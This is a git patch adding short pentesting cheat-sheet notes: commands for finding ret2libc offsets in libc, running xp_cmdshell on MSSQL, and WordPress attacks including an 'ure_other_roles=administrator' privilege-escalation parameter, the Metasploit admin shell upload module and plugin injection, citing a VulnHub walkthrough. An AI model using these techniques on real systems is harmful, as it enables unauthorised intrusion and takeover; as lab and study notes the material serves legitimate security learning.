From edb74c88ef225321098092d50abdf1cb7f77fdb6 Mon Sep 17 00:00:00 2001 From: whx Date: Sun, 12 Dec 2021 00:54:07 +0100 Subject: [PATCH] mssql --- exploit/binaries/ret2libc.md | 13 +++++++++++++ exploit/sqli/mssql.md | 9 +++++++++ exploit/web/wordpress.md | 22 ++++++++++++++++++++++ 3 files changed, 44 insertions(+) create mode 100644 exploit/binaries/ret2libc.md create mode 100644 exploit/sqli/mssql.md create mode 100644 exploit/web/wordpress.md diff --git a/exploit/binaries/ret2libc.md b/exploit/binaries/ret2libc.md new file mode 100644 index 0000000..caf40c8 --- /dev/null +++ b/exploit/binaries/ret2libc.md @@ -0,0 +1,13 @@ +# Ret2libc + + +## Finding offsets + +* On target find `sh` address inside libc +```sh +strings -a -t x /lib32/libc.so.6 | grep /bin/sh +``` +* Sub from `system` address from inside libc +```sh +readelf -s /lib32/libc.so.6 | grep system +``` diff --git a/exploit/sqli/mssql.md b/exploit/sqli/mssql.md new file mode 100644 index 0000000..b175ec0 --- /dev/null +++ b/exploit/sqli/mssql.md @@ -0,0 +1,9 @@ +# MSSQL + +# Usage + +* `sqsh` as a shell +* After connection is established check `xp_cmdshell' +```sh +xp_cmdshell 'whoami'; +``` diff --git a/exploit/web/wordpress.md b/exploit/web/wordpress.md new file mode 100644 index 0000000..12a9d75 --- /dev/null +++ b/exploit/web/wordpress.md @@ -0,0 +1,22 @@ +# Wordpress + +## ure_user_roles + +* [exploitdb 44595](https://exploit-db.com/exploits/44595.) +* [windsordeveloper](https://windsorwebdeveloper.com/dc-6-vulnhub-walkthrough/) + +* Update user profile and append POST parameter to gain administrator role on user +```sh +&ure_other_roles=administrator +``` + +## Shell Upload + +* Msfconsole +```sh +exploit/unix/webapp/wp_admin_shell_upload +``` + +## Template & Plugin Editing + +* If template injection does not work, use plugin injection on `akismet.php`